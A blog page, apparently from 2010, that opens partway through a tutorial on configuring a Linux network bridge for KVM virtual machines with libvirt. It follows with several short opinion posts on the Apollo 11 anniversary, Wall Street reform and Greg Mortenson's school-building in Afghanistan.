BRIDGE=br0

Note: HWADDR= line does not appear to be needed.

Create and edit ifcfg-br0 to read:

DEVICE=br0
ONBOOT=yes
TYPE=Bridge
BOOTPROTO=none
IPADDR=192.168.1.5
GATEWAY=192.168.1.1
STP=off
DELAY=0

Change your IP address (IPADDR variable) and gateway (GATEWAY variable) to suit your network environment.

Restart the network:
# service network restart

Configure iptables to forward traffic accross the bridge:

# iptables -I FORWARD -m physdev --physdev-is-bridged -j ACCEPT
# service iptables save
# service iptables restart

Restart the libvirtd daemon:
# service libvirtd reload

Check to see if your bridge br0 exists:
# brctl show

Should it still not work, in Virtual Machine Manager, go to Edit -> Host Details -> Network Interfaces and add a br0 interface if it is missing. This should rebuild the ifcfg-br0 script in /etc/sysconfig/network-scripts. Restart your network again.

To migrate your virtual machines from the default virtual network which is NATed, change directory to /etc/libvirt/qemu and edit your virtual machine's xml file.

Change interface type='network' to interface type='bridge'.
Change source network='default' to source bridge='br0'.

Altering those two lines should do it.
Then,
# cd /etc/libvirt/qemu
# virsh create virtual_machine_name.xml
(e.g.
# virsh create kubuntu-kvm.xml
Domain kubuntu-kvm created from kubuntu-kvm.xml)

If the virsh create command produces an error, note it carefully and check your edited xml file.

41st Anniversary of the Apollo 11 Moon Landing

2010-07-20T23:32:00.003-05:00

Forty-one years ago today, Neil Armstrong and Buzz Aldrin landed and stepped foot on the lunar surface. It was a momentous event in human history. For a brief period of time, they united the world. People all over the world said, "We did it!" For that brief moment, everyone forgot their squabbles and celebrated history in the making. Now, forty-one years later, we have people denying that the landings ever took place, a broken and demoralized NASA, a corrupt and shady banking system, a dysfunctional government, and Afghanistan (Vietnam Part Deux). Can't we all come together as Americans and solve our problems. It's not like we are going to the Moon. We know what to do. We have the knowledge and experience and expertise to fix things. We don't need millionaires and billionaires telling us what financial and social sacrifices we have to make on their behalf. Everyone can share and sacrifice and prosper, and just maybe, after the work is done, we can say again, "We did it!"

Deficit Hawks are a Different Raptor Indeed

2010-07-19T00:59:00.001-05:00

What a deficit hawk truly is.

Goldman Sacks!

2010-07-19T00:56:00.001-05:00

Goldman Sacks! They make Viking raiders look nice by comparison. At least the Vikings didn't screw their own.

The Arsonist Will Be Okay

2010-07-18T19:43:00.002-05:00

Ben Sargent cartoon on Wall Street Reform. As will these arsonists.

Building Peace One School at a Time

2010-07-18T16:28:00.005-05:00

The NY Times has an article about Greg Mortenson of the Central Asia Institute. Bill Moyers interviewed Mr. Mortenson last January. Here's a Charlie Rose interview on July 27, 2010. This is where our best hope lies in Afghanistan and Pakistan. When you can make grown men happy with a swing set in a playground in Afghanistan, you are doing something right. Mr. Mortenson is strengthening communities and helping them flourish. The Taliban are actually dividing communities and taking the men and boys from villages for their own ends. Mr. Mortenson has been told that the Taliban have lost their Saudi funding and have resorted to crime for their fund raising. That's an interesting development. What I don't understand though is why the US government is not adopting Mr Mortenson's approach and building more schools and clinics along the same lines using villagers to build the schools so that they have a stake in the process. Please watch the videos and see for yourself what one man can do with a little bit of money where whole armies have failed.